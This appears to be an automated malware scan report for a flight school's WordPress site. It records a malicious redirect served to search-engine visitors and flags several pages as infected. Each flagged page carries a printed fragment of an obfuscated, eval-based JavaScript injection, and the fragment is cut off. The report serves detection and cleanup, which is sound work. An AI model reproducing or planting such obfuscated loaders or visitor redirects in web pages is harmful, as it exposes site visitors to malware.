Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://wrightsflightschool.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: wrightsflightschool.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 31 May 2014 20:43:08 GMT Location: http://79.96.82.196/ZDJ%caCIAcom/url?sa=t&rct=j&q=wrightsflightschool.com&source=web&cd=1&ved=0CDEQFjAG&url=http:%252F%252Fwrightsflightschool.com%252F&ei=wC7yT5qCJbCCkQKtnwE&usg=AFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg0APTEKI/rel.php Server: nginx/1.6.0 Content-Length: 541 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://wrightsflightschool.com/ | 200 OK Content-Length: 21983 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=77;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,108,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,109,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,48,51,41,48,46,39,50,45,37, Antivirus reports:
| ||
http://wrightsflightschool.com/wp-content/themes/airport_travels_bue023/script.js | 200 OK Content-Length: 6575 Content-Type: application/javascript | clean |
http://platform.linkedin.com/in.js | 200 OK Content-Length: 3711 Content-Type: text/javascript | clean |
http://wrightsflightschool.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://s.gravatar.com/js/gprofiles.js?aa&ver=3.4.2 | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://wrightsflightschool.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.4.2 | 200 OK Content-Length: 930 Content-Type: application/javascript | clean |
http://wrightsflightschool.com/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=0.1 | 200 OK Content-Length: 8877 Content-Type: application/javascript | clean |
http://apis.google.com/js/plusone.js | 200 OK Content-Length: 11663 Content-Type: application/javascript | clean |
http://stats.wordpress.com/e-201422.js | 200 OK Content-Length: 2346 Content-Type: application/x-javascript | clean |
http://wrightsflightschool.com/sample-page/ | 200 OK Content-Length: 20351 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=77;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,108,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,109,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,48,51,41,48,46,39,50,45,37, Antivirus reports:
| ||
http://wrightsflightschool.com/contact/ | 200 OK Content-Length: 19809 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=77;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,108,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,109,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,48,51,41,48,46,39,50,45,37, Antivirus reports:
| ||
http://wrightsflightschool.com/links/ | 200 OK Content-Length: 19746 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=77;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,108,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,109,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,48,51,41,48,46,39,50,45,37, Antivirus reports:
| ||
http://wrightsflightschool.com/pictures/ | 200 OK Content-Length: 19471 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=77;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,108,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,109,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,48,51,41,48,46,39,50,45,37, Antivirus reports:
| ||
http://wrightsflightschool.com/services/ | 200 OK Content-Length: 20190 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=77;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,108,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,109,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,48,51,41,48,46,39,50,45,37, Antivirus reports:
| ||
http://wrightsflightschool.com/services/?share=email | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 31 May 2014 20:43:19 GMT Location: http://wrightsflightschool.com/services/?shared=email&msg=fail Server: nginx/1.6.0 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://wrightsflightschool.com/xmlrpc.php | clean |
http://wrightsflightschool.com/services/?shared=email&msg=fail | 200 OK Content-Length: 20190 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=77;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,108,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,109,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,48,51,41,48,46,39,50,45,37, Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wrightsflightschool.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wrightsflightschool.com/
Result: wrightsflightschool.com is not infected or malware details are not published yet.
Result: wrightsflightschool.com is not infected or malware details are not published yet.